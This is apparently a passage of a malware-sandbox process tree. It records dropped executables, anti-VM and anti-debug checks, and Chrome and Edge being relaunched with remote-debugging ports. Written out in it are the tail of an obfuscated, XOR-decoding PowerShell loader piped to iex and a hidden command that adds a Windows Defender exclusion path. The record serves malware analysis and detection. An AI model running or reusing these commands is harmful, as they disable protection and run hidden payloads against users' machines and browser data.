UQA2AEYAdwBzAGMAQgB6AG8ASwBWADEASQB5AE8AdwBCAEoARgBRADAANQBBAHkAUQB4AE0AaABVAHkAUABSAEkAcQBFAFEAcwA1AEcAeQBZAG4ASAB4AEkAbABLAHkANAB4AEMAQwBJAGMAQQB6AEEATgBDAEMAOABsAE8AQQA4AEQAQQBEAEkATQBQAFQAbwBNAEoAaQBjAGkATwBBADkAQQBBAEQASQBEAEwAVABBAHkATgBpAFIAaQBPAEEAQQBtAFUAdwBrAE0AQgBDADAAbABOAGkAUgBzAFAAbgBSAEEAQQBEAEYAbQBFADMAbwB4AFYAdwBFAHkARgBEADQAeQBDAHcAMABUAE8AWABvAGgASQBTAE0AeQBGAHgATQBFAFgAaQBkAG0AQQAzADQASgBQAFQAYwB5AFAAQgBaAE4AVwBnAD0APQAnADsAJABmAG4AYgByAHUAegBhAD0AJwBxAEcAcABnAGgAVABVAEoAaABlAGYAVQAnADsAJABiAHEAcgBuAHkAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AHcAbABxAHMAagBkACkAOwAkAGEAeABvAGkAYgBsAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGIAcQByAG4AeQAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHEAcgBuAHkAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABmAG4AYgByAHUAegBhAFsAJABpACUAJABmAG4AYgByAHUAegBhAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAeABvAGkAYgBsACkAKQB8AGkAZQB4AA==7⤵PID:5904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"6⤵
- Command and Scripting Interpreter: PowerShell
PID:6948
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe"C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4196 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff9a54cc40,0x7fff9a54cc4c,0x7fff9a54cc587⤵PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2244,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2240 /prefetch:27⤵PID:6404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2584 /prefetch:37⤵PID:4928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2032,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2676 /prefetch:87⤵PID:5752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:17⤵
- Uses browser remote debugging
PID:6288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:17⤵
- Uses browser remote debugging
PID:6644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:17⤵
- Uses browser remote debugging
PID:5888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4196 /prefetch:87⤵PID:7060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:87⤵PID:7012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3648,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:87⤵PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4932,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:87⤵PID:7128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:87⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:87⤵PID:6040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5288 /prefetch:87⤵PID:6372
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fff92fb46f8,0x7fff92fb4708,0x7fff92fb47187⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:27⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:37⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2676 /prefetch:27⤵PID:5720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:87⤵PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:17⤵
- Uses browser remote debugging
PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:17⤵
- Uses browser remote debugging
PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2456 /prefetch:27⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2468 /prefetch:27⤵PID:6844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:27⤵PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3692 /prefetch:27⤵PID:7040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3716 /prefetch:27⤵PID:5904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4344 /prefetch:27⤵PID:6700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4364 /prefetch:27⤵PID:2716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6420 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:6964 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fffa184cc40,0x7fffa184cc4c,0x7fffa184cc588⤵PID:6612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2324,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:28⤵PID:3940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2576 /prefetch:38⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1788,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2716 /prefetch:88⤵PID:4536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:18⤵
- Uses browser remote debugging
PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3512 /prefetch:18⤵
- Uses browser remote debugging
PID:4656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4428 /prefetch:18⤵
- Uses browser remote debugging
PID:6524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:88⤵PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4288,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:88⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:88⤵PID:6196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5268,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5276 /prefetch:88⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5412,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:88⤵PID:3024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4856 /prefetch:88⤵PID:1224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:88⤵PID:6492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5532,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:88⤵PID:2844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4912,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:28⤵
- Uses browser remote debugging
PID:6316
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:5720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffb00946f8,0x7fffb0094708,0x7fffb00947188⤵PID:6468
-
-
